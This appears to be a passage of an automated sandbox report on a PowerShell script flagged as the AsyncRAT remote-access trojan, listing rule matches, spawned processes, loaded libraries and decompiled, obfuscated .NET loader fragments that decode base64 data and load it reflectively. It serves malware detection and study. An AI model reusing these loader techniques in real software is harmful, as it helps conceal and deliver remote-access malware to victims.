              Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015EC2D84_2_015EC2D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015EB5984_2_015EB598
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015E64984_2_015E6498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015E86184_2_015E8618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015E5BC84_2_015E5BC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015E58804_2_015E5880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015E0FA04_2_015E0FA0
              Source: 0.2.powershell.exe.1ac16030578.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.1ac16e49e40.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000002.3913764509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1483546758.000001AC16DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1483546758.000001AC16083000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000002.1483546758.000001AC15E57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.evad.winPS1@6/5@0/1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\o8kSNczORMveFDjV
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzzekrex.fgy.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: mhqxUdpe7V.ps1Virustotal: Detection: 9%
              Source: mhqxUdpe7V.ps1ReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\mhqxUdpe7V.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.JAcwvugr7yueKabGzBseGV7hjHu3W5QkNTNx8sjM423vV0qUPhEfZ5MkLIEJU4xShmmuAovdOhpox4n3YIsmafGmDjbdd,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ._0L8f3WleevzcnPl9n2WNh7NW3wKOwPuy3tb1aRsXW0f6uDBis6nnThh3XPCCqA67oaXX8IvfAGwXsJMVtwgg9Ni2DmPT8,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.AXmSpip9Rgys9UoRCdGDlWOrb1oWCmZg9LzuKvf7aAgnKzemNYUyaBbirLIHk9vkM1Q5MLhWeOn1dI5xukaKG5mOVcOdq,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.pdozcqiNcmOnTnX1sUHm37yRWYhfKxfHJgJzzWfK4H9V6gQ9zRXQa28p93aV0bU5xPMwelYaDwx7MaHuT0cauWHxV6Umo,QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.ZUrIm4Kp1Nn4jNQE1iMoBcsuerfZEYytj3QZ()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[2],QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.sOh0Jlwra2Jn4MOGwAe1E2VHcq3RkFs1RAqN(Convert.FromBase64String(YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.JAcwvugr7yueKabGzBseGV7hjHu3W5QkNTNx8sjM423vV0qUPhEfZ5MkLIEJU4xShmmuAovdOhpox4n3YIsmafGmDjbdd,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ._0L8f3WleevzcnPl9n2WNh7NW3wKOwPuy3tb1aRsXW0f6uDBis6nnThh3XPCCqA67oaXX8IvfAGwXsJMVtwgg9Ni2DmPT8,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.AXmSpip9Rgys9UoRCdGDlWOrb1oWCmZg9LzuKvf7aAgnKzemNYUyaBbirLIHk9vkM1Q5MLhWeOn1dI5xukaKG5mOVcOdq,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.pdozcqiNcmOnTnX1sUHm37yRWYhfKxfHJgJzzWfK4H9V6gQ9zRXQa28p93aV0bU5xPMwelYaDwx7MaHuT0cauWHxV6Umo,QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.ZUrIm4Kp1Nn4jNQE1iMoBcsuerfZEYytj3QZ()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[2],QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.sOh0Jlwra2Jn4MOGwAe1E2VHcq3RkFs1RAqN(Convert.FromBase64String(YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs.Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887A5A0B1 push cs; ret 0_2_00007FF887A5A0E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887A56FDC push eax; iretd 0_2_00007FF887A56FDD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887A5C752 pushfd ; ret 0_2_00007FF887A5C757
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF887A5AB3C push es; iretd 0_2_00007FF887A5AB67
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, b02VErUOAyp7KgsN3bFDF2auprIqAGCLaGMp.csHigh entropy of concatenated method names: 'INkezmr6hizs7DYFjV4aAMMuO4B8vcIzpRzl', '_1UgweADLCOTyFcav1bCSPpZmBT2YjbCvAU2a', 'N38ShQwEPMzDIeuhJy4EphCuYO22ULsDR4AR', 'VQJXMcVFd751mpqtfhNss', 'MoXo9dtjQWauKcR4tF0QZ', '_9KThUWSyhPoAhybqdEEGn', 'ZOGHWakUiTGxpDEMxkgVq', 'VbdrNDJi8xPxLw2mCoL5G', 'ZDOPOAfhNiZba9q2wF0zk', 'gLT3eh2G9sbPPYX5MS02M'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, ecfzk1BLTMVYPDpfIlTKGWKme1YqqZGoyQ7Vc33TJphCOCCj76EqW1abpBIyhIQ4ZDwplcAJv1P6YGgTLqEZyNFN0Yjag.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'aBhmG8hesQRZx5swb8QklvJR7WenRTLT4PpJ', 'J3SeuSTYALTr3yfRGGRIng8jjRcOlYfMvoE8', 'EoOkNZdPQEWcWFnAib8PkZw6yS7hompPojzR', 'FJElkQ5aMB1hwH9O2Q9GR2Cz4GaNeyxzx8iv'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.csHigh entropy of concatenated method names: 'ACdeIzXseyPo4zWqWy02RazcDiWaeYEF3sMU', 'KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K', 'N1sexz3RI1DpSUs8sFctRkct2k71o6Dw5adn', 'UqsaOcNK4UPWrSnz315O3fHPN7hmKXXzM5ek', 'JVZHi2GrdZvpd6rLMCYrVVcMGmoHeoBq6p3H', 'pyZ9AMn9R81CWO7jWKyfev1oi7ghwwdSnb3i', 'qZ6RmsuveDKUm2nZ6abIPK0CPfRROfax8QwG', 'NKRNz1jRg2dg9416sbsJ9O1Prxh7Ujl233zE', 'ai8NTPVbOPHKdfOoapJOEteWyRNHxMPPWDhT', 'NvDSL0KgPKbgoTgffwjCGHfA0D7JbHNtdeDP'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.csHigh entropy of concatenated method names: 'Vl7IYPbs0k94qffFzhKGetVhWAXE2DuwFW3Z', '_0Byrd5Yenv0fM67D8WjMm', 'FTmqyKQFF2nZLlpTlQxHj', 'ycVPE2G11CcWkNNNsiscT', '_1Ou3AbDogGuZOToO0DEh1'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, tSBhnwvdpxEXyJxA8lGv4Bgp4p8TME6qQQXq.csHigh entropy of concatenated method names: 'NxpU6fdmEe350QRzSjmBG9bNgqiTmTVt3HvB', '_0iGLzTupk4oCtdljtdO0J', 'GH26cbm9WLUxhV866JkHg', '_41oPTrdIImlCUF6BZDilb', 'sy473pUm38ZS8xSNy8qaL'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csHigh entropy of concatenated method names: 'J8wHw2osnqTKiwkc3AZR8dJNxdbogdSKtxmF', 'qRcvRLsx0rxBIjhYsY9PC5vCWjsb8g2zuOH7', 'hLvrRQnXSt6R0bWy2ezji7tuxQIXN8qZ0RVf', 'ceHhszv7a2pCt2179HvaC23Hie2toqek6kQm', 'rMQUqeCYVWFCeYXZemrUiFJninSg7w4dNwcp', 'w5OdajmqiE1M7BW3IMdtUvegP99kuNYpO8vy', 'BjIxTPFBlXVTDrgqc7l5EYgWBO9QbMzlkizN', 'Su3QHI7NRcYJwIpsPYz5ohtFr2qfwzPcRLZJ', 'vABejWKfbSdGkHO9pNjXKLu0vDNBKiHgCRXA', '_5rpp77KCzZlHIngjWeMz70hTryBV4kjkB21s'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, Ovf0N5CQI1OINhI7lGry0rZm9kRY1ouImX1rRJDUauSsRBy7XEy1Vt7xi5mHlsT56DNCiId2YJlUZmsE23x0zAxkvKtDD.csHigh entropy of concatenated method names: 'U5sr0xpHdPhDSSbzFhxVIzRWeUyjHKaz7fC1kB0zXHJhnGI0CUd6SU5JrE3jDkMuJaZ7EPji9ym2R2XoRsaHYn1rH30jX', '_1uaG3Jmqcbu2z3C6aXj7JDQp2ADrLzHvGZEbDAKFqxfCBIw8pqHWCSMAzwDlV7JEVIKw2jbg6Y6KWsHnPlqFhGkgkWgUO', 'zQW9aPhZQcTvVUKWPGF2Lx6BnGfcxuOWukqHMV5NabLvy73gvdWFFJrw8wap5tuyfzFK81X3Lcq2tDHNKzdH2wLMcfc6J', '_4evsVFwMgy4n0x0cZfFsT', 'bqSHGcZwiXLgYoIjsUGSg', 'Wgka3ShlAx39hjLg9aMl6', '_1GVuR1tPkrWg5WEjE8zNi', 'Gf4QevTLf6VvSRMQTyTwD', 'pLeUDmoCnx132zeKo40LY', 'OnEtj15FfkoF6zFGMzPj9'
              Source: 0.2.powershell.exe.1ac16030578.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csHigh entropy of concatenated method names: 'xIeDGhWJh2dTLJj2KIKIkFlXgJ7yVJFMa5ZsnMElaczn389Ab5jcRZjYkKt4ktw9FQNKLIiNSjxfAYBeFydeIuEsxRDU0', 'iidSY7kDOs5FStDZNmRMEjt7glMgsaLCx80cm1y6v2rBQX100VXnfdgl8ByYbIq1ko8jZmN3f7W1XVjrN27WQa2rilPm8', 'FExflqz2ggYzAB8RkhZzQMhxx6cV08pL74aeNkOLC16P1A5u4mPbh4a9MT8ExggxPZvlSo1Qtx8QnVUuKM1ZGz1xvvbVE', 'GrEs6aQJtRM5DVNA9OStPBAI69B70MrCQV4OAAGaHOcugd3H2svSK0xh9ENhsIxRZzNDGBo079U7lkA0mxcejrA46fvwu', 'jXQ7CW5pazCc1V0AEwdp5SnRJDYF7u5sZpU1n9bZRSjgDRix2AIbxFkub0H4SD8hHRAob5vbVGbs5kHrIA0a7heeGQbl7', 'glsn8zXWNedoYiCWR7ggZIm7mZY5mNmOoEyXSr6Gd9iu88DRgb03GoD5Jw1HVc9eduqMCd7d76L4cERmtSvnznvJHtpF0', 'iccNNeoF51wTxbpATnVFbAdt8d8MulXIqrA55pnFvGlLeEqiiqogIHyvrrBCs4jIsjlfOXE0IFpBmAe8fJwMIuIbeX9Kf', 'jZpp5aIkL5DUHdMmI7HQBPJ6EmvQxikeAD4IAgyMBLIyLX0x1fcGkG6MTlxst0p7C61krxBu4e1dGyIgXSrjFGo1hTvqR', 'pXBe9HFDtAdZotphcgbdt1jtfMAXkED5dptTH1HtOoBwh5VCyGpNPIeDaGpQRtHO5QEcup2bma2XS7Ndj7k2FVaPEumb1', 'Q1EltKwM1R3yq1zXEHilAmDHGT4S5fhl21UG'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, b02VErUOAyp7KgsN3bFDF2auprIqAGCLaGMp.csHigh entropy of concatenated method names: 'INkezmr6hizs7DYFjV4aAMMuO4B8vcIzpRzl', '_1UgweADLCOTyFcav1bCSPpZmBT2YjbCvAU2a', 'N38ShQwEPMzDIeuhJy4EphCuYO22ULsDR4AR', 'VQJXMcVFd751mpqtfhNss', 'MoXo9dtjQWauKcR4tF0QZ', '_9KThUWSyhPoAhybqdEEGn', 'ZOGHWakUiTGxpDEMxkgVq', 'VbdrNDJi8xPxLw2mCoL5G', 'ZDOPOAfhNiZba9q2wF0zk', 'gLT3eh2G9sbPPYX5MS02M'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, ecfzk1BLTMVYPDpfIlTKGWKme1YqqZGoyQ7Vc33TJphCOCCj76EqW1abpBIyhIQ4ZDwplcAJv1P6YGgTLqEZyNFN0Yjag.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'aBhmG8hesQRZx5swb8QklvJR7WenRTLT4PpJ', 'J3SeuSTYALTr3yfRGGRIng8jjRcOlYfMvoE8', 'EoOkNZdPQEWcWFnAib8PkZw6yS7hompPojzR', 'FJElkQ5aMB1hwH9O2Q9GR2Cz4GaNeyxzx8iv'
